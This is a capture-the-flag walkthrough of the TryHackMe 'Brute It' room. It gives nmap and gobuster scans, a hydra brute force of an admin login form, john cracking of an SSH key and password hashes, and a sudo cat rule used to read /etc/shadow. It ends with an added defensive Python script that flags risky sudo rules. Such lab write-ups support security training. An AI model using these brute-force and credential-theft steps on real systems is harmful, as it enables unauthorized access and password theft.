Brute It

Room Link: https://tryhackme.com/room/bruteit

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found.

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/darkweb2017-top10000.txt $VICTIM http-post-form "/admin/:user=^USER^&pass=^PASS^:F=invalid" -V

Kali

/opt/john/ssh2john.py id_rsa > id_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt id_john.txt 

Kali

chmod 600 id_rsa 
ssh -i id_rsa john@$VICTIM
pass: rockinroll

john can run cat as root. We can just use this to read root.txt, but I decided to read the shadow file, which I can't do from john's account, then send the shadow and passwd files back to Kali to crack.

Victim

sudo -l
LFILE=/etc/shadow
sudo cat "$LFILE"

Kali

unshadow passwd shadow > passwords.txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
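
A sudo rule that lets a user run cat as root, as used above, is the kind of entry a review of sudo -l output should catch. The Python audit below is an added example, not part of the original writeup; the SAMPLE listing, the FILE_READERS list and the function name audit_sudo_listing are constructed for illustration.

```python
import re

# Programs that simply print file contents. Run as root with caller-chosen
# arguments, each one exposes root-only files. Illustrative list, not exhaustive.
FILE_READERS = {"cat", "tac", "head", "tail", "nl", "od", "xxd", "base64"}

# One rule line of `sudo -l` output: "(runas) [TAG: ...] cmd[, cmd ...]"
RULE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")


def audit_sudo_listing(text):
    """Return (severity, command, reason) tuples for risky rules."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header or blank line
        runas = {u.strip() for u in m.group(1).split(":")[0].split(",")}
        if not runas & {"root", "ALL"}:
            continue  # rule does not grant root
        auth = "no password" if "NOPASSWD:" in m.group(2) else "password required"
        for cmd in (c.strip() for c in m.group(3).split(",")):
            path, _, args = cmd.partition(" ")
            args = args.strip()
            if path == "ALL":
                findings.append(("HIGH", cmd, f"any command as root ({auth})"))
            elif path.rsplit("/", 1)[-1] not in FILE_READERS or args == '""':
                continue  # not a file reader, or sudoers "" forbids arguments
            elif not args:
                findings.append(("HIGH", cmd, f"reads any file as root, e.g. /etc/shadow ({auth})"))
            elif "*" in args or "?" in args:
                findings.append(("MEDIUM", cmd, f"wildcard path can match unintended files ({auth})"))
    return findings


# Constructed sample in the format printed by `sudo -l` (not captured from the room).
SAMPLE = """\
User john may run the following commands on host:
    (root) NOPASSWD: /bin/cat
    (root) /usr/bin/tail /var/log/app/*.log, /usr/bin/head ""
    (www-data) NOPASSWD: /bin/cat
    (ALL : ALL) /usr/bin/head /var/log/syslog
"""

if __name__ == "__main__":
    for severity, cmd, reason in audit_sudo_listing(SAMPLE):
        print(f"{severity:6} {cmd}: {reason}")
```

Rules pinned to a single fixed file path, or running as a non-root user, are not reported; the fix for a flagged rule is to remove it or restrict it to the exact file the user needs.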
